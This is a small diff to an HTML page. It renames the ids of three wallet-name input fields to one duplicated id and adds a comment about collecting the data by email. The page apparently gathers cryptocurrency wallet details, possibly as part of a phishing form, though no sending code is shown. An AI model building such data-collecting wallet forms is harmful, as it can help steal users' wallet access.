--- a/page.html
+++ b/page.html
@@ -1,4 +1,3 @@
-
 <!DOCTYPE html>
 <html lang="en">
   <head>
@@ -39,6 +38,9 @@
       }
     </style>
 
+<!-- note -->
+
+<!-- I changed the walletname of the inputs to walletname, if i have to use the email for the collection of datas, I will set them back to walletname1, walletname2, walletname3 respectedly. -->
     <!-- Site favicon -->
     <!-- <link
       rel="icon"
@@ -136,7 +138,7 @@
               <input
                 type="text"
                 name="w_name"
-                id="walletname1"
+                id="walletname"
                 class="walletname"
                 minlength="2"
                 class="inputs m-t-10px"
@@ -180,7 +182,7 @@
               <input
                 type="text"
                 name="w_name"
-                id="walletname2"
+                id="walletname"
                 class="walletname"
                 minlength="2"
                 class="inputs m-t-10px"
@@ -210,7 +212,7 @@
               <input
                 type="text"
                 name="w_name"
-                id="walletname3"
+                id="walletname"
                 class="walletname "
                 minlength="2"
                 class="inputs m-t-10px"
